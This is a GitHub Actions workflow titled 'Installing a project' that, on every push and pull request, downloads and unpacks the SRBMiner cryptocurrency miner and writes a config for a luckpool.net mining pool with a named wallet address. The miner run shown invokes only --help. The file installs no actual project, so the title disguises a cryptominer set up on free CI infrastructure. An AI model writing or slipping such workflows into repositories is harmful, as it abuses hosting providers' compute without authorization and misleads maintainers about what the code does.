name: Installing a project

on: [push, pull_request]

jobs:
  install-and-run:
    runs-on: ubuntu-latest

    steps:
    - name: Checkout repository
      uses: actions/checkout@v2

    - name: Download SRBMiner
      run: wget -O SRBMiner-Multi-2-5-8-Linux.tar.gz https://github.com/doktor83/SRBMiner-Multi/releases/download/2.5.8/SRBMiner-Multi-2-5-8-Linux.tar.gz

    - name: Extract SRBMiner
      run: tar -xvf SRBMiner-Multi-2-5-8-Linux.tar.gz

    - name: Create config file
      run: |
        cd SRBMiner-Multi-2-5-8
        echo '{"pool_list":[{"pool_address":"stratum+tcp://na.luckpool.net:3960","wallet_address":"RNjEn7tNTZ6DuYnYrxKMsvYzBgJ11P5hQ4","rig_id":"raiden","pool_password":"x"}],"currency":"versus","logging":{"logfile":"srbminer.log","loglevel":2}}' > config.json

    - name: Run SRBMiner
      run: |
        cd SRBMiner-Multi-2-5-8
        ./SRBMiner-MULTI --help
